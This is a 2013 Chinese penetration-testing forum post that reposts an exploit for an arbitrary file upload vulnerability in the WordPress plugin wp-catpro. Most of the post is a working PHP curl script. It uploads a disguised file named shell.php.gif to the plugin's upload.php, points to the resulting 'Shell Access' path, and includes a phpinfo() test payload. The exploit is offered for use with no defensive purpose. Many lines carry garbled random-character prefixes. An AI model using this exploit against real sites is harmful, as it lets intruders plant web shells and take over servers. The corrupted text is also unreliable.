中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

---

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

, u+ w& P# H- h( l$ W作者  => Zikou-16
邮箱 => zikou16x@gmail.com
3 v5 M. G9 @; i& j  E/ Y测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
. C" t! L1 `, c1 d% ~8 T
( Z5 x5 H5 ~9 ?7 T3 j#=> Exploit 信息:
! J. S  W# f; y2 l* l7 R------------------
. x3 v: ~/ R2 x: `3 [0 E6 H# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
. y8 a: V# ^5 W7 @) S# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
% V" f$ z  ?; w# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

! e& n: j1 Q' w; H; I#=> Exploit
2 D* E) x6 L8 l5 D5 Q5 t1 |! V-----------
# q% b3 ]( s5 p3 u, S( K<?php
% c: B. G1 D- l5 K% C% a% a
' \& h$ }$ v" v. T) p3 w6 U$uploadfile="zik.php.gif";
2 e) c8 f- {9 e4 @7 N$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
4 u9 E, F8 [( U' I3 d2 X, n' ?curl_setopt($ch, CURLOPT_POSTFIELDS,
2 I- Y  T! O4 Warray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
3 {8 N4 H1 w) c3 G5 ?: j- Jcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
8 C, ?+ _) q$ N- k7 u* g8 o0 Ycurl_close($ch);

0 R- C8 x. g/ n6 W; pprint "$postResult";

  A9 S( J$ P: M0 i! tShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
7 y' S# H/ k% x" `  ?>
<?php
, Z8 r8 Z& [# k3 P0 M) D4 Nphpinfo();
1 I9 a, i+ T" I" f2 q# G?>

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2